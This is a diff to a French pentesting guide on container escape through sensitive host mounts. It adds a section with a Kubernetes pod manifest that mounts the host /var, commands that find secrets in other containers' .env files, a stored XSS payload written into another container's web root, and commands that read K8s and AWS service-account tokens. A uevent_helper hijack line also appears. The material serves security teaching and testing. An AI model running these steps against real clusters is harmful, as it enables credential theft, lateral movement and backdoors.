 echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
 
@@ -148,7 +148,7 @@ cat /output %%%
 
 #### **`/sys/kernel/vmcoreinfo`**
 
-- Fuit des adresses du noyau, compromettant potentiellement KASLR.
+- Fuit les adresses du noyau, compromettant potentiellement KASLR.
 
 #### **`/sys/kernel/security`**
 
@@ -158,12 +158,98 @@ cat /output %%%
 #### **`/sys/firmware/efi/vars` et `/sys/firmware/efi/efivars`**
 
 - Expose des interfaces pour interagir avec les variables EFI dans NVRAM.
-- Une mauvaise configuration ou exploitation peut conduire à des ordinateurs portables brisés ou à des machines hôtes non amorçables.
+- Une mauvaise configuration ou exploitation peut conduire à des ordinateurs portables bloqués ou à des machines hôtes non amorçables.
 
 #### **`/sys/kernel/debug`**
 
 - `debugfs` offre une interface de débogage "sans règles" au noyau.
-- Historique de problèmes de sécurité en raison de sa nature sans restriction.
+- Historique de problèmes de sécurité en raison de sa nature non restreinte.
+
+### Vulnérabilités de `/var`
+
+Le dossier **/var** de l'hôte contient des sockets d'exécution de conteneur et les systèmes de fichiers des conteneurs. Si ce dossier est monté à l'intérieur d'un conteneur, ce conteneur obtiendra un accès en lecture-écriture aux systèmes de fichiers d'autres conteneurs avec des privilèges root. Cela peut être abusé pour pivoter entre les conteneurs, provoquer un déni de service ou créer des portes dérobées dans d'autres conteneurs et applications qui s'exécutent en eux.
+
+#### Kubernetes
+
+Si un conteneur comme celui-ci est déployé avec Kubernetes :
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+name: pod-mounts-var
+labels:
+app: pentest
+spec:
+containers:
+- name: pod-mounts-var-folder
+image: alpine
+volumeMounts:
+- mountPath: /host-var
+name: noderoot
+command: [ "/bin/sh", "-c", "--" ]
+args: [ "while true; do sleep 30; done;" ]
+volumes:
+- name: noderoot
+hostPath:
+path: /var
+```
+À l'intérieur du conteneur **pod-mounts-var-folder** :
+```bash
+/ # find /host-var/ -type f -iname '*.env*' 2>/dev/null
+
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs/usr/src/app/.env.example
+<SNIP>
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/135/fs/docker-entrypoint.d/15-local-resolvers.envsh
+
+/ # cat /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/105/fs/usr/src/app/.env.example | grep -i secret
+JWT_SECRET=85d<SNIP>a0
+REFRESH_TOKEN_SECRET=14<SNIP>ea
+
+/ # find /host-var/ -type f -iname 'index.html' 2>/dev/null
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/57/fs/usr/src/app/node_modules/@mapbox/node-pre-gyp/lib/util/nw-pre-gyp/index.html
+<SNIP>
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html
+/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html
+
+/ # echo '<!DOCTYPE html><html lang="en"><head><script>alert("Stored XSS!")</script></head></html>' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/sh
+are/nginx/html/index2.html
+```
+L'XSS a été réalisé :
+
+![Stored XSS via mounted /var folder](/images/stored-xss-via-mounted-var-folder.png)
+
+Notez que le conteneur NE nécessite PAS de redémarrage ou quoi que ce soit. Tous les changements effectués via le dossier monté **/var** seront appliqués instantanément.
+
+Vous pouvez également remplacer des fichiers de configuration, des binaires, des services, des fichiers d'application et des profils shell pour obtenir un RCE automatique (ou semi-automatique).
+
+##### Accès aux identifiants cloud
+
+Le conteneur peut lire les jetons de service K8s ou les jetons webidentity AWS, ce qui permet au conteneur d'accéder de manière non autorisée à K8s ou au cloud :
+```bash
+/ # cat /host-var/run/secrets/kubernetes.io/serviceaccount/token
+/ # cat /host-var/run/secrets/eks.amazonaws.com/serviceaccount/token
+```
+#### Docker
+
+L'exploitation dans Docker (ou dans les déploiements Docker Compose) est exactement la même, sauf que généralement les systèmes de fichiers des autres conteneurs sont disponibles sous un chemin de base différent :
+```bash
+$ docker info | grep -i 'docker root\|storage driver'
+Storage Driver: overlay2
+Docker Root Dir: /var/lib/docker
+```
+Les systèmes de fichiers se trouvent sous `/var/lib/docker/overlay2/`:
+```bash
+$ sudo ls -la /var/lib/docker/overlay2
+
+drwx--x---  4 root root  4096 Jan  9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d
+drwx--x---  4 root root  4096 Jan 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496
+drwx--x---  4 root root  4096 Jan  9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f
+drwx--x---  4 root root  4096 Jan  9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2
+<SNIP>
+```
+#### Remarque
+
+Les chemins réels peuvent différer selon les configurations, c'est pourquoi votre meilleur choix est d'utiliser la commande **find** pour localiser les systèmes de fichiers des autres conteneurs.
 
 ### Références
 
